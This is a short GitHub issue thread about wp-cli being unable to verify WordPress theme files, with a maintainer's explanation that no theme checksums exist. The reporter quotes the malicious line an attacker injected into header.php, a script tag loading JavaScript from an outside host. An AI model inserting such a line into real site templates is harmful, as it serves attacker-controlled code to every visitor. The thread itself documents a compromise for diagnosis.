wp-cli core verify-checksums does not check extra themes
paulharris opened this issue · 2 comments
Our website got hacked, and an extra <script> line was added to the header.php:
wp-content/themes/astra/header.php:<script src='https://cdn.scriptsplatform.com/scripts/header.js' type='text/javascript'></script><?php
I didn't see any way of checking theme checksums directly,
and the core verify-checksums only warned me about extra files that should not exist (like wp-admin/error_log and wp-admin/.rnd)
I tried --debug flag but it didn't mention anything about iterating through themes either.
Surely there is a way to verify themes haven't been modified?
There are no checksums stored for themes anywhere.
wp core verify-checksums is for WordPress 'core' files
wp plugin verify-checksums is for plugin files hosted at wordpress.org
There is no wp theme verify-checksums command because wordpress.org doesn't record or store theme file checksums anywhere like it does with plugins and core files. wp-cli/ideas#149 has some more details.
Ok, I'll close this issue and comment in the ideas thread instead. Thanks!